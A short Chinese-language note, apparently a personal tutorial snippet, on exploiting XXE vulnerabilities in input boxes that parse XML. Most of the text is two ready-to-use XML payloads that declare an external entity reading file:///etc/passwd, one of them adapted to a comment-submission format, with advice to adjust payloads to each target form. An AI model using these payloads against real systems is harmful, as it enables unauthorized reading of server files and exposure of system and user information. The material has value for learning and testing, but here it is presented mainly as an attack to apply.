对于XXE漏洞的利用
在有些可以运行xml的对话框中,可以利用XXE漏洞,来查看一些文件
这是将passwd暴露出来的例子
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
原文中有更多的使用例子
但值得注意的是原文的例子不能直接拿来用,得根据对话框的格式来进行相关的修改
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment>
comment的内容就是的随机应变的内容